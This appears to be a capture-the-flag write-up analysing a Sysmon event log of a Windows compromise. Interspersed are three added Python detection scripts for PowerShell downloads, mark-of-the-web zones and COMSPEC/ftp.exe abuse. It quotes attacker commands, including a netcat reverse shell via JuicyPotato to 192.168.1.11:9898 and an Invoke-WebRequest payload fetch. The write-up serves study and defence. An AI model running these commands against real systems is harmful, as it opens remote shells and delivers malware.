Log Analysis - Sysmon

I read through the questions and decided to temporarily skip question 1, because I had no idea how to approach it.

2) What is the powershell cmdlet used to download the malware file and what is the port? (2 points)

Let's try searching for powershell to see if there's anything there.

After searching in Mousepad (the text editor) there were far too many matches, so I grepped for them and exported the results to a file to make them easier to read:

```bash
grep 'powershell' sysmon-events.json > powershell.json
```


it’s quite… ummm like tinder in my eyes @~@


After sitting down and reading through it, I spotted the problem here: it downloads the file supply.exe from 192.168.1.11 on port 6969.

Invoke-WebRequest is a PowerShell cmdlet for fetching content from a URL or interacting with web services.
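The grep above is case-sensitive and still leaves you reading raw JSON by hand. As an added example (my own code, not part of the original write-up), the script below parses newline-delimited Sysmon events, picks out process-creation events where PowerShell ran a download cmdlet, and pulls the URL, host and port out of the command line. The sample events are constructed, and the flat one-object-per-line layout with top-level `EventID`/`Image`/`CommandLine` keys is an assumption; the challenge's real sysmon-events.json may differ, in which case only `parse_events()` needs adjusting.

```python
import json
import re
from urllib.parse import urlparse

# Constructed sample in the layout this example assumes: one Sysmon event per
# line, with EventData fields flattened to top-level keys. The challenge's real
# sysmon-events.json may use a different layout, so adjust parse_events() to it.
SAMPLE_EVENTS = r'''
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "PowerShell -nop -w hidden -c \"Invoke-WebRequest -Uri http://192.168.1.11:6969/supply.exe -OutFile C:\\Windows\\Temp\\supply.exe\""}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe Get-Date"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe report.txt"}
{"EventID": 3, "Image": "C:\\Windows\\Temp\\supply.exe", "DestinationIp": "192.168.1.11", "DestinationPort": 9898}
'''

# Cmdlets, aliases and .NET methods commonly used to fetch files from PowerShell,
# mapped to a canonical name. Heuristic list, not exhaustive; Invoke-WebRequest
# is the one found in the post.
DOWNLOAD_CMDLETS = {
    "invoke-webrequest": "Invoke-WebRequest",
    "iwr": "Invoke-WebRequest",
    "wget": "Invoke-WebRequest",   # alias in Windows PowerShell 5.1
    "curl": "Invoke-WebRequest",   # alias in Windows PowerShell 5.1
    "invoke-restmethod": "Invoke-RestMethod",
    "irm": "Invoke-RestMethod",
    "downloadfile": "WebClient.DownloadFile",
    "downloadstring": "WebClient.DownloadString",
}

URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE)


def parse_events(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_powershell_downloads(events):
    """Return (cmdlet, url, host, port) for each process-creation event (EventID 1)
    in which PowerShell ran a download cmdlet with a URL on its command line.
    Matching is case-insensitive, unlike a plain grep 'powershell'."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        cmd = ev.get("CommandLine", "")
        low = cmd.lower()
        if "powershell" not in ev.get("Image", "").lower() and "powershell" not in low:
            continue
        cmdlet = next(
            (name for alias, name in DOWNLOAD_CMDLETS.items()
             if re.search(r"\b" + re.escape(alias) + r"\b", low)),
            None,
        )
        if cmdlet is None:
            continue
        for url in URL_RE.findall(cmd):
            parsed = urlparse(url)
            # Explicit port if present, otherwise the scheme's default.
            port = parsed.port or (443 if parsed.scheme.lower() == "https" else 80)
            hits.append((cmdlet, url, parsed.hostname, port))
    return hits


if __name__ == "__main__":
    for cmdlet, url, host, port in find_powershell_downloads(parse_events(SAMPLE_EVENTS)):
        print(f"{cmdlet}: {url} (host={host}, port={port})")
```

Run against the sample it reports `Invoke-WebRequest: http://192.168.1.11:6969/supply.exe (host=192.168.1.11, port=6969)`, which is the answer to question 2; the event with `Get-Date` and the notepad event are ignored because no download cmdlet appears.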


Invoke-WebRequest, 6969

After identifying the attacker's address, I went back through the original file to see whether it interacts with anything else.


Oh well, so something was also downloaded through Chrome; time to go back to question 1.

1) What is the file that gave access to the attacker? (2 points)

I read through it and everything looked pretty normal until I saw a download of an updater.hta file .-.

It was logged with EventID 15.


Let's go through them one by one.

I just found this report :)))


Information about EventID 15:

This event logs when a named file stream is created, and it generates events that log the hash of the contents of the file to which the stream is assigned (the unnamed stream), as well as the contents of the named stream. There are malware variants that drop their executables or configuration settings via browser downloads, and this event is aimed at capturing that based on the browser attaching a Zone.Identifier “mark of the web” stream.


From this it can be concluded that Chrome was used to download updater.hta from the host 192.168.1.11.

Do you see the ZoneTransfer with ZoneId=3?

After researching ZoneTransfer on Google:

```
0 — Local Machine Zone
1 — Local Intranet Zone
2 — Trusted Sites Zone
3 — Internet Zone
4 — Restricted Sites Zone
```

So now you know what ZoneId=3 means, right ~
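To turn the EventID 15 / ZoneId=3 observation into something repeatable, here is an added example (my own code, not from the original write-up) that parses the `[ZoneTransfer]` text Sysmon records in the stream `Contents` field, resolves the ZoneId to the zone names listed above, and flags Internet-zone downloads of file types that execute code when opened, which is how updater.hta stands out. The sample events are constructed, the flat one-object-per-line layout with `TargetFilename`/`Contents`/`Image` keys is an assumption about the export format, and `RISKY_EXTENSIONS` is an assumed watch-list to tune per environment.

```python
import json
import re
from pathlib import PureWindowsPath

# URLMON security zones as written to the Zone.Identifier stream (the list above).
ZONES = {
    0: "Local Machine Zone",
    1: "Local Intranet Zone",
    2: "Trusted Sites Zone",
    3: "Internet Zone",
    4: "Restricted Sites Zone",
}

# File types that execute code when opened; .hta is the one from the post.
# Assumed watch-list for this example; tune it to your environment.
RISKY_EXTENSIONS = {".hta", ".exe", ".dll", ".js", ".jse", ".vbs", ".vbe",
                    ".wsf", ".ps1", ".bat", ".cmd", ".scr", ".lnk", ".msi"}

# Constructed sample Sysmon EventID 15 (FileCreateStreamHash) events in the
# flattened one-object-per-line layout this example assumes. Contents holds the
# Zone.Identifier stream text with its line breaks collapsed to spaces.
SAMPLE_EVENTS = r'''
{"EventID": 15, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "TargetFilename": "C:\\Users\\user\\Downloads\\updater.hta:Zone.Identifier", "Contents": "[ZoneTransfer]  ZoneId=3  HostUrl=http://192.168.1.11/updater.hta"}
{"EventID": 15, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "TargetFilename": "C:\\Users\\user\\Downloads\\report.pdf:Zone.Identifier", "Contents": "[ZoneTransfer]  ZoneId=3  HostUrl=http://intranet.example/report.pdf"}
{"EventID": 15, "Image": "C:\\Windows\\explorer.exe", "TargetFilename": "C:\\Users\\user\\Downloads\\tool.exe:Zone.Identifier", "Contents": "[ZoneTransfer]  ZoneId=1  HostUrl=file://fileserver/share/tool.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"}
'''

STREAM_SUFFIX = ":zone.identifier"


def parse_events(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def parse_zone_identifier(contents):
    """Turn the [ZoneTransfer] key=value text into a dict with the zone name resolved.
    Returns None if the stream is not a ZoneTransfer block."""
    if "[ZoneTransfer]" not in contents:
        return None
    fields = dict(re.findall(r"(\w+)=(\S+)", contents))
    zone_id = int(fields["ZoneId"]) if fields.get("ZoneId", "").isdigit() else None
    return {
        "zone_id": zone_id,
        "zone": ZONES.get(zone_id, "Unknown"),
        "host_url": fields.get("HostUrl"),
        "referrer_url": fields.get("ReferrerUrl"),
    }


def find_internet_zone_downloads(events, risky_extensions=RISKY_EXTENSIONS):
    """Flag EventID 15 events where a downloader attached a mark-of-the-web with
    ZoneId=3 (Internet) to a file whose extension can execute code."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 15:
            continue
        target = ev.get("TargetFilename", "")
        if not target.lower().endswith(STREAM_SUFFIX):
            continue
        path = target[: -len(STREAM_SUFFIX)]       # strip ":Zone.Identifier"
        info = parse_zone_identifier(ev.get("Contents", ""))
        if info is None or info["zone_id"] != 3:
            continue
        ext = PureWindowsPath(path).suffix.lower()
        if ext in risky_extensions:
            findings.append({
                "file": path,
                "downloader": PureWindowsPath(ev.get("Image", "")).name,
                "zone": info["zone"],
                "host_url": info["host_url"],
            })
    return findings


if __name__ == "__main__":
    for f in find_internet_zone_downloads(parse_events(SAMPLE_EVENTS)):
        print(f"{f['downloader']} wrote {f['file']} ({f['zone']}) from {f['host_url']}")
```

On the sample only updater.hta is reported: the PDF came from the Internet zone but is not on the watch-list, and tool.exe carries ZoneId=1 (Local Intranet). The `HostUrl` field is worth keeping in the finding, since it is what let the post tie the download back to 192.168.1.11.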

updater.hta

3) What is the name of the environment variable set by the attacker? (2 points)

After a morning of research, I found a blog post about this issue from Huntress.

After reading it, we know that COMSPEC is an environment variable that normally points to cmd.exe.


comspec=c:\Windows\temp\supply.exe

4) What is the process used as a LOLBIN to execute malicious commands? (2 points)

Here is a document for reference: Hunting for LoLBins

Simply put, it means abusing a binary that the operating system itself provides.

After the comspec environment variable was set, the binary ftp.exe was executed.
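Questions 3 and 4 together describe one pattern: COMSPEC redirected to supply.exe, then ftp.exe launched so that its shell escape runs whatever COMSPEC points to. As an added example (my own code, not from the original write-up or the Huntress post), the detection below runs over constructed Sysmon process-creation events and raises two findings: a command line that sets COMSPEC to anything other than the system cmd.exe, and ftp.exe spawning a child that is not cmd.exe. The flat one-object-per-line layout with `Image`/`CommandLine`/`ParentImage` keys is an assumption about the export format, and the `LEGIT_COMSPEC` allow-list is a heuristic for this example.

```python
import json
import re
from pathlib import PureWindowsPath

# Constructed sample Sysmon EventID 1 (ProcessCreate) events in the flattened
# one-object-per-line layout this example assumes. They mirror the chain in the
# post: COMSPEC pointed at supply.exe, then ftp.exe executed.
SAMPLE_EVENTS = r'''
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c set comspec=c:\\Windows\\temp\\supply.exe", "ParentImage": "C:\\Windows\\Temp\\supply.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\ftp.exe", "CommandLine": "ftp", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"EventID": 1, "Image": "C:\\Windows\\Temp\\supply.exe", "CommandLine": "c:\\Windows\\temp\\supply.exe", "ParentImage": "C:\\Windows\\System32\\ftp.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\ipconfig.exe", "CommandLine": "ipconfig", "ParentImage": "C:\\Windows\\Temp\\supply.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c set COMSPEC=%SystemRoot%\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe", "ParentImage": "C:\\Windows\\System32\\ftp.exe"}
'''

# Matches "comspec=<value>" in a command line, with or without quotes.
COMSPEC_RE = re.compile(r'\bcomspec\s*=\s*"?([^"&|\s]+)', re.IGNORECASE)

# Values of COMSPEC considered normal (heuristic allow-list, lower-cased).
LEGIT_COMSPEC = {
    r"c:\windows\system32\cmd.exe",
    r"%systemroot%\system32\cmd.exe",
    r"%comspec%",
}


def parse_events(text):
    """Parse newline-delimited JSON events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_comspec_redirect(events):
    """Rule 1: a process-creation command line sets COMSPEC to a non-standard path."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        for m in COMSPEC_RE.finditer(ev.get("CommandLine", "")):
            value = m.group(1)
            if value.lower().rstrip("\\") not in LEGIT_COMSPEC:
                hits.append({"rule": "comspec-redirect",
                             "image": ev.get("Image"), "comspec": value})
    return hits


def find_ftp_shell_escape(events):
    """Rule 2: ftp.exe spawns a child other than cmd.exe. ftp's '!' shell escape
    launches %COMSPEC%, so a legitimate escape produces cmd.exe; anything else
    means COMSPEC was pointed elsewhere (the LOLBIN behaviour from the post)."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        parent = PureWindowsPath(ev.get("ParentImage", "")).name.lower()
        child = PureWindowsPath(ev.get("Image", "")).name.lower()
        if parent == "ftp.exe" and child != "cmd.exe":
            hits.append({"rule": "ftp-child-not-cmd",
                         "image": ev.get("Image"), "parent": ev.get("ParentImage")})
    return hits


def run_detections(events):
    """Apply both rules and return the combined findings in rule order."""
    return find_comspec_redirect(events) + find_ftp_shell_escape(events)


if __name__ == "__main__":
    for hit in run_detections(parse_events(SAMPLE_EVENTS)):
        print(hit)
```

On the sample, rule 1 fires for `comspec=c:\Windows\temp\supply.exe` but not for the reset to `%SystemRoot%\System32\cmd.exe`, and rule 2 fires for supply.exe under ftp.exe but not for the ordinary cmd.exe child. Rule 2 is the more robust of the two: it does not depend on seeing the `set` command at all, only on parent/child lineage, which Sysmon records for every process start.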


ftp.exe

5) The malware executed multiple identical commands at a time; what is the first command executed? (2 points)

I hadn't done anything yet, just scrolled down and read, and boom!! kkk

I can see it executing the ipconfig command.


ipconfig

6) Looking at the dependency events around the malware, can you figure out the language the malware is written in? (2 points)

Searching for supply.exe, I see python27.dll being loaded, so yes, it is written in Python.


python

7) The malware then downloads a new file; find out the full URL of the downloaded file (4 points)

Do you remember the PowerShell file we exported at the start? Open it and you will see ~

I suggest you read more about it here: juicy-potato


https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

8) What is the port the attacker attempts to get a reverse shell on? (4 points)

After JuicyPotato was downloaded, the attacker executed the following command (as it appears in the exported JSON, with escaped quotes):

```
juicy.exe -l 9999 -p nc.exe -a \"192.168.1.11 9898 -e cmd.exe\
```


9898

complete :_)


goodbye, thank you for reading until now //~//

This post is licensed under CC BY 4.0 by the author.